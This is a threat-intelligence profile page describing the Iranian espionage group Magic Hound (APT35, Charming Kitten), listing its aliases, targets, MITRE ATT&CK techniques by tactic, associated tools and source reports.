← threatfilter.dev / all groups / Magic Hound
Magic Hound
Also known as: TA453 · COBALT ILLUSION · Charming Kitten · ITG18 · Phosphorus · Newscaster · APT35 · Mint Sandstorm
Overview
Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.
Targets
Defense · Diplomacy · Government · Military · Technology
Regions
Iraq · Israel · Saudi Arabia · U.S. government/defense sector websites · United Kingdom
Capabilities
- Exploitation of public-facing / client applications — ATT&CK T1190
- Custom malware/implant development — ATT&CK: 3 attributed custom malware families
TTPs — 78 techniques across 14 tactics
Reconnaissance
-
T1589Gather Victim Identity Information -
T1589.001Credentials -
T1589.002Email Addresses -
T1590.005IP Addresses -
T1591.001Determine Physical Locations -
T1592.002Software -
T1595.002Vulnerability Scanning -
T1598.003Spearphishing Link
Resource Development
-
T1583.001Domains -
T1583.006Web Services -
T1584.001Domains -
T1585.001Social Media Accounts -
T1585.002Email Accounts -
T1586.002Email Accounts -
T1588.002Tool
Initial Access
-
T1189Drive-by Compromise -
T1190Exploit Public-Facing Application -
T1566.002Spearphishing Link -
T1566.003Spearphishing via Service
Execution
-
T1047Windows Management Instrumentation -
T1053.005Scheduled Task -
T1059.001PowerShell -
T1059.003Windows Command Shell -
T1059.005Visual Basic -
T1204.001Malicious Link -
T1204.002Malicious File
Persistence
-
T1098.002Additional Email Delegate Permissions -
T1098.007Additional Local or Domain Groups -
T1136.001Local Account -
T1505.003Web Shell -
T1547.001Registry Run Keys / Startup Folder
Stealth
-
T1027.010Command Obfuscation -
T1027.013Encrypted/Encoded File -
T1036.004Masquerade Task or Service -
T1036.005Match Legitimate Resource Name or Location -
T1036.010Masquerade Account Name -
T1070.003Clear Command History -
T1070.004File Deletion -
T1078.001Default Accounts -
T1078.002Domain Accounts -
T1218.011Rundll32 -
T1564.003Hidden Window
Defense Impairment
-
T1112Modify Registry -
T1685Disable or Modify Tools -
T1685.001Disable or Modify Windows Event Log -
T1686.003Windows Host Firewall
Credential Access
-
T1003.001LSASS Memory
Discovery
-
T1016System Network Configuration Discovery -
T1016.001Internet Connection Discovery -
T1016.002Wi-Fi Discovery -
T1018Remote System Discovery -
T1033System Owner/User Discovery -
T1046Network Service Discovery -
T1049System Network Connections Discovery -
T1057Process Discovery -
T1082System Information Discovery -
T1083File and Directory Discovery -
T1087.003Email Account -
T1482Domain Trust Discovery
Lateral Movement
-
T1021.001Remote Desktop Protocol -
T1570Lateral Tool Transfer
Collection
-
T1005Data from Local System -
T1056.001Keylogging -
T1113Screen Capture -
T1114Email Collection -
T1114.001Local Email Collection -
T1114.002Remote Email Collection -
T1560.001Archive via Utility
Command and Control
-
T1071Application Layer Protocol -
T1071.001Web Protocols -
T1090Proxy -
T1102.002Bidirectional Communication -
T1105Ingress Tool Transfer -
T1571Non-Standard Port -
T1572Protocol Tunneling -
T1573Encrypted Channel
Exfiltration
Impact
Tools & malware (13)
Net · Impacket · Ping · CharmPower · FRP · Mimikatz · Systeminfo · ipconfig · netsh · PowerLess · Pupy · DownPaper · PsExec
Reporting (3)
- How Microsoft names threat actors — Microsoft
- APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit — Check Point
- Operation SpoofedScholars: A Conversation with TA453 — Miller, J. et al